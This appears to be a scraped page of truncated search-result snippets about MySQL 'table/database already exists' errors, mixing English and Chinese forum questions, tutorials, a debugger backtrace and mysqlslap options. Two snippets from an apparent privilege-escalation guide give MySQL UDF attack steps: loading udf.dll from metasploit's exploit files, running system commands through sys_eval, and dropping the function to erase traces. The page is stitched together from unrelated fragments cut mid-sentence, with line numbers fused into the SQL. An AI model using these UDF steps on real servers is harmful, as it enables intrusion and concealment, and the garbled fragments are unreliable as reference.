I was expecting to create a three column table. However, MySQL kept reporting error : ERROR 1050 (42S01): Table 'word' already exists. The fact is there is no table in this database. I then changed the table name, engine type, MySQL still report the same problem. I've tried changin...
MySQL :: Re: Fatal error: Can't change to run as user 'mysql'. Please check that the user exists! https://forums.mysql.com/read.php?11,83400,91927#msg-91927 Can't find error-message file '/usr/local/mysql/share/errmsg.sys'. Check error-message file location and 'lc-messages-dir'...
1mysql>create database school; 如果有了在创建就会报错2ERROR1007(HY000): Can't create database'school'; database exists3mysql>CREATE DATABASE IF NOT EXISTS school;4Query OK,1row affected,1warning (0.00sec)56mysql>CREATE DATABASE IF NOT EXISTS school;7Query OK,1row affected,1warning (0.00s...
1、CREATE DATABASE 语句 语法 CREATE DATABASE database_name;用法举例,创建一个名字为my_db数据库 CREATE DATABASE my_db;我们不能创建两个同名的数据库,否则会报错:创建同名数据库警告所以有时候我们在创建的时候加一个判断语句: CREATE DATABASE IF NOT EXISTS database_name;带有判断语句的数据库创建...
(thd=0x2eeb858, table_list=0x2fa20c8) at lock.cc:976 #5 0x00000000007ff039 in mysql_rm_table_part2 (thd=0x2eeb858, tables=0x2fa20c8, if_exists=true, drop_temporary=false, drop_view=true, dont_log_query=true) at sql_table.cc:1907 #6 0x00000000007ec6fc in mysql_rm_known_files...
056--create=name 指定用于创建表的.sql文件或者字串 057File or string to use create tables. 058--create-schema=name 指定待测试的数据库名,MySQL中schema也就是database,默认是mysqlslap 059Schema to run testsin. 060--csv[=name] Generate CSV output to namedfileor to stdoutifnofile ...
解释“mysql the service already exists”的含义 “mysql the service already exists”是一个错误提示,意味着你尝试创建一个名为“mysql”的服务,但是这个服务已经存在于你的系统中。这通常发生在使用Windows服务管理器(如sc create命令)或Linux的系统服务管理工具(如systemctl或service命令)时。 可能导致这个提示出现...
Can't open shared library 'udf.dll' (errno: 193 ) 如果在create function sys_eval returns string soname 'udf.dll'; 遇到这个说明你dll不对或者过于老旧,从kali中找一个全新的dll kali中udf提权dll的位置 /usr/share/metasploit-framework/data/exploits/mysql/ 复制出来即可,选择的dll的版本和mysql版本要...
create function sys_eval returns string soname 'udf.dll'; 7、命令执行 select sys_eval("whoami"); 六、痕迹清除 1、删除表 drop table udf; 2、删除函数 drop function sys_eval; 七、其他问题 1、ERROR 1125 (HY000): Function 'sys_eval' already exists 提示sys_eval 函数已经存在,可能已经被利...
I create a database with workbench and when i import it in mysql there is this error. I read in a lot of messages that it is a fk problem but after looking for it in the sql code for hours i really don't see it. Can you help me please. ...